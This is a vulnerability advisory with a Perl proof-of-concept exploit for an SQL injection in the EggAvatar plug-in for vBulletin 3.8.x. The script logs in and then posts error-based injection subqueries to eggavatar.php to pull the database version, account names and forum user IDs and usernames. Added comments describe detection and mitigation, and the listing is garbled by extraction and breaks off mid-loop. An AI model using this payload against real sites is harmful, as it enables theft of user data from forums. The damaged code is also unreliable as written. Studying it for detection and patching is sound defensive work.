vBulletin is a well-known commercial forum application. The EggAvatar plug-in for vBulletin 3.8.x has an SQL injection vulnerability that may lead to leakage of sensitive information.
[+] Info:
~~~~~~~~~
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability
[+] Poc:
~~~~~~~~~
01 #! /Usr/bin/env perl
02 use LWP: UserAgent;
# banner: prints the author's banner and contact line to stdout. It takes no
# arguments and performs no network or file activity.
# NOTE(review): this listing was damaged in extraction (gutter numbers fused
# into every line, quotes and `::` separators lost), so it is not valid Perl
# as shown; read it as a record of what the script sends, not as runnable code.
03 sub banner {
04 print "###################################";
05 print "########### DSecurity ############";
06 print "###################################";
07 print "# Email: dsecurity. vn [at] gmail.com #";
08 print "###################################";
09}
# Argument check: with fewer than five command-line arguments the script
# prints its usage text and exits before any request is made.
10 if (@ ARGV <5 ){
11 print "Usage: $0 address username password number_user sleeptime ";
12 print "Example: $0 http: // localhost/vbb test 10 10 ";
13 exit ();
14}
# A single LWP user agent is created and shared by every request below; the
# cookie jar keeps the session cookies set by the login request.
# Detection: the User-Agent header is set to the fixed string on the next
# line, so unmodified runs of this script stand out in web-server access logs.
15 $ ua = LWP: UserAgent-> new ();
16 $ ua-> agent ("DSecurity ");
17 $ ua-> cookie_jar ({});
# login(username, password): sends a form-encoded POST to login.php under the
# base URL given in $ARGV[0], using the shared user agent.
# The response is assigned to $res but never inspected, and the caller ignores
# the return value, so a rejected login is not detected by this script.
# NOTE(review): the script authenticates before sending anything else, which
# suggests the affected plug-in endpoint is only reachable by logged-in
# accounts -- TODO confirm against the plug-in source.
18 sub login (@){
19 my $ username = shift;
20 my $ password = shift;
21 my $ req = HTTP: Request-> new (POST => $ ARGV [0]./login. php? Do = login );
22 $ req-> content_type (application/x-www-form-urlencoded );
23 $ req-> content ("vb_login_username = $ username & vb_login_passwor = $ password & s = & securitytoken = login & do = login & vb_login_md5password = & Signature = ");
24 my $ res = $ ua-> request ($ req );
25}
# v_request(label, select, from, where, limit): sends one POST to eggavatar.php
# whose `eggavatar` form field carries a SQL subquery, then returns the label
# concatenated with whatever text was captured from a "MySQL Error" string in
# the response body.
#
# Positional arguments are read from @_ as: output label, selected expression,
# table, WHERE condition, LIMIT offset. Empty table/where/limit values fall
# back to information_schema.tables, 1 and 0; the pause between requests comes
# from $ARGV[4] and falls back to 10 seconds.
#
# What this shows about the flaw: the `eggavatar` value starts with a number
# and is followed by SQL text, so the plug-in presumably places that request
# parameter into a query without forcing it to an integer or binding it as a
# parameter -- verify against the plug-in source. The data comes back only
# because the database error message is echoed in the HTTP response.
#
# Mitigation: validate `eggavatar` as an integer (or use a bound parameter) in
# the plug-in, and do not return database error text to clients.
# Detection: POSTs to eggavatar.php with do=addegg where `eggavatar` is not a
# plain integer, request bodies naming information_schema, the fixed
# securitytoken value below, and responses that contain "MySQL Error".
26 sub v_request {
27 # Declare
28 $ print =$ _ [0];
29 $ select =$ _ [1];
30 $ from =$ _ [2];
31 $ where =$ _ [3];
32 $ limit = $ _ [4];
33 $ sleep = $ ARGV [4];
34 if ($ from eq) {$ from = information_schema.tables ;}
35 if ($ where eq) {$ where = 1 ;}
36 if ($ limit eq) {$ limit = 0 ;}
37 if ($ sleep eq) {$ sleep = 10 ;}
38
39 # Create a request
40 my $ req = HTTP: Request-> new (POST => $ ARGV [0]./eggavatar. php );
41 $ req-> content_type (application/x-www-form-urlencoded );
# The request body: action `addegg`, a hard-coded securitytoken, and the
# `eggavatar` field that holds the injected subquery built from the arguments.
42 $ req-> content (do = addegg & securitytoken = 1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961 & eggavatar = 1. "and (SELECT 1 FROM (select count (*), CONCAT (select $ select from $ from WHERE $ where limit $ limit, 1), FLOOR (RAND (1) * 3) foo FROM information_schema.tables group by foo) a) ---& uid = 1 & pid = 1 ");
43 # Pass request to the user agent and get a response back
44 my $ res = $ ua-> request ($ req );
45 # print $ res-> content;
# The value is recovered from the server's error output, which is why
# suppressing database error messages removes this channel.
46 if ($ res-> content = ~ /(MySQL Error )(.*?) (.*?) 0 (.*)/)
47 {$ test = $3 };
# Fixed pause after every request; the requests arrive at a steady interval.
48 sleep ($ sleep );
49 return $ print. $ test ."";
50}
# Main flow: print the banner and the advisory header, log in with the
# credentials from $ARGV[1] and $ARGV[2], then issue four v_request calls.
# The header lines record the affected combination stated by the author:
# plug-in version 2.3.2, tested on vBulletin 3.8.0.
51 & banner;
52 print "##################################### ##################################";
53 print "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability #";
54 print "# Date: 06-03-2011 #";
55 print "# Author: DSecurity #";
56 print "# Software Link: html"> http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #";
57 print "# Version: 2.3.2 #";
58 print "# Tested on: vBulletin 3.8.0 #";
59 print "##################################### ######################################## #####";
60
61 # login
62 login ($ ARGV [1], $ ARGV [2]);
63 # Foot print
# Each call below is one HTTP request; together they read the database server
# version, data directory, database account and database name. For incident
# response, four such requests in sequence after a login are the opening
# pattern of this script in the access log.
64 print v_request (MySQL version:, @ version );
65 print v_request (Data dir:, datadir );
66 print v_request (User:, user ());
67 print v_request (Database:, database ());
68 # Get user
69 for ($ I = 1; $ I <= $ ARGV [3]; $ I ++ ){
70 print "-----------------------------------------";
71 print $ id = v_request (ID:, userid, user, 1, $ i-1 );
72 if ($ id = ~ /(ID :) s (.*)/){
73 print v_request (Group:, usergroupid, user, userid =. $2 );
74 print v_request (Username:, username, user, userid =. $2 );
75